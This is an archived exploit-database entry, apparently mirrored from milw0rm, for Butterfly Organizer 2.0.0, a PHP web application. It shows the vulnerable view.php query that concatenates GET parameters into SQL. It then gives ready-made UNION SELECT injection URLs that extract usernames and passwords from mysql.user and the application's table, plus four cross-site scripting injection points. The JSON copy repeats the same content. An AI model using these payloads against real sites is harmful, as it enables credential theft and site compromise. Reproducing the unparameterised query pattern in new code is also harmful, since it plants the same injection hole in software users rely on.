Search...

Butterfly ORGanizer 2.0.0 - SQL Injection Cross-Site Scripting

2008-06-13T00:00:00

ID EXPLOITPACK:78746EA9ECFBEEB270CE7795005348E4
Type exploitpack
Reporter CWH Underground
Modified 2008-06-13T00:00:00

Description

Butterfly ORGanizer 2.0.0 - SQL Injection Cross-Site Scripting

                                        
                                            ======================================================================
 Butterfly Organizer 2.0.0 (SQL/XSS) Multiple Remote Vulnerabilities
======================================================================

  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /           
  / XXXXXX /
 (________(             
  `------'

AUTHOR : CWH Underground
DATE : 13 June 2008
SITE : www.citec.us


#####################################################
APPLICATION : Butterfly Organizer
VERSION     : 2.0.0
DOWNLOAD    : www.butterflymedia.ro/downloads/organizer_2_0_0.zip
#####################################################

+++ Remote SQL Injection Exploit +++

----------------------------
 Vulnerable Code [view.php]
----------------------------
@Line

   26: $mytable = $_GET['mytable'];
   27: $id = $_GET['id'];
   28:
   29: $result = mysql_query("SELECT * FROM ".$mytable." WHERE id=$id",$database);
   30: $myrow = mysql_fetch_array($result);


----------
 Exploit
----------
[+] http://[Target]/[Organizer_Path]/view.php?id=&lt;SQL INJECTION&gt;&mytable=test_category


-------------
 POC Exploit
-------------
[+] http://192.168.24.25/organizer/view.php?id=-99999/**/UNION/**/SELECT/**/concat(user,0x3a,password),2,3,4,5,6,7,8,9,10/**/FROM/**/mysql.user&mytable=test_category
[+] http://192.168.24.25/organizer/view.php?id=-99999/**/UNION/**/SELECT/**/concat(username,0x3a,password),2,3,4,5,6,7,8,9,10/**/FROM/**/test_category&mytable=test_category



+++ Remote XSS Exploit +++


-----------
 Exploits
-----------
[+] http://[Target]/[Organizer_Path]/view.php?id=1&mytable=&lt;XSS&gt;
[+] http://[Target]/[Organizer_Path]/viewdb2.php?id=1&mytable=&lt;XSS&gt;
[+] http://[Target]/[Organizer_Path]/category-rename.php?tablehere=&lt;XSS&gt;
[+] http://[Target]/[Organizer_Path]/module-contacts.php?letter=&lt;XSS&gt;


##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
##################################################################

# milw0rm.com [2008-06-13]

JSON Vulners Source

Initial Source

{"lastseen": "2020-04-01T19:04:07", "references": [], "description": "\nButterfly ORGanizer 2.0.0 - SQL Injection Cross-Site Scripting", "edition": 1, "reporter": "CWH Underground", "exploitpack": {"type": "webapps", "platform": "php"}, "published": "2008-06-13T00:00:00", "title": "Butterfly ORGanizer 2.0.0 - SQL Injection Cross-Site Scripting", "type": "exploitpack", "enchantments": {"dependencies": {"references": [], "modified": "2020-04-01T19:04:07", "rev": 2}, "score": {"value": 0.8, "vector": "NONE", "modified": "2020-04-01T19:04:07", "rev": 2}, "vulnersScore": 0.8}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2008-06-13T00:00:00", "id": "EXPLOITPACK:78746EA9ECFBEEB270CE7795005348E4", "href": "", "viewCount": 1, "sourceData": "======================================================================\n Butterfly Organizer 2.0.0 (SQL/XSS) Multiple Remote Vulnerabilities\n======================================================================\n\n ,--^----------,--------,-----,-------^--,\n | ||||||||| `--------' | O\t.. CWH Underground Hacking Team ..\n `+---------------------------^----------|\n `\\_,-------, _________________________|\n / XXXXXX /`| /\n / XXXXXX / `\\ /\n / XXXXXX /\\______(\n / XXXXXX / \n / XXXXXX /\n (________( \n `------'\n\nAUTHOR : CWH Underground\nDATE : 13 June 2008\nSITE : www.citec.us\n\n\n#####################################################\nAPPLICATION : Butterfly Organizer\nVERSION : 2.0.0\nDOWNLOAD : www.butterflymedia.ro/downloads/organizer_2_0_0.zip\n#####################################################\n\n+++ Remote SQL Injection Exploit +++\n\n----------------------------\n Vulnerable Code [view.php]\n----------------------------\n@Line\n\n 26: $mytable = $_GET['mytable'];\n 27: $id = $_GET['id'];\n 28:\n 29: $result = mysql_query(\"SELECT * FROM \".$mytable.\" WHERE id=$id\",$database);\n 30: $myrow = mysql_fetch_array($result);\n\n\n----------\n Exploit\n----------\n[+] http://[Target]/[Organizer_Path]/view.php?id=<SQL INJECTION>&mytable=test_category\n\n\n-------------\n POC Exploit\n-------------\n[+] http://192.168.24.25/organizer/view.php?id=-99999/**/UNION/**/SELECT/**/concat(user,0x3a,password),2,3,4,5,6,7,8,9,10/**/FROM/**/mysql.user&mytable=test_category\n[+] http://192.168.24.25/organizer/view.php?id=-99999/**/UNION/**/SELECT/**/concat(username,0x3a,password),2,3,4,5,6,7,8,9,10/**/FROM/**/test_category&mytable=test_category\n\n\n\n+++ Remote XSS Exploit +++\n\n\n-----------\n Exploits\n-----------\n[+] http://[Target]/[Organizer_Path]/view.php?id=1&mytable=<XSS>\n[+] http://[Target]/[Organizer_Path]/viewdb2.php?id=1&mytable=<XSS>\n[+] http://[Target]/[Organizer_Path]/category-rename.php?tablehere=<XSS>\n[+] http://[Target]/[Organizer_Path]/module-contacts.php?letter=<XSS>\n\n\n##################################################################\n# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos #\n##################################################################\n\n# milw0rm.com [2008-06-13]", "cvss": {"score": 0.0, "vector": "NONE"}}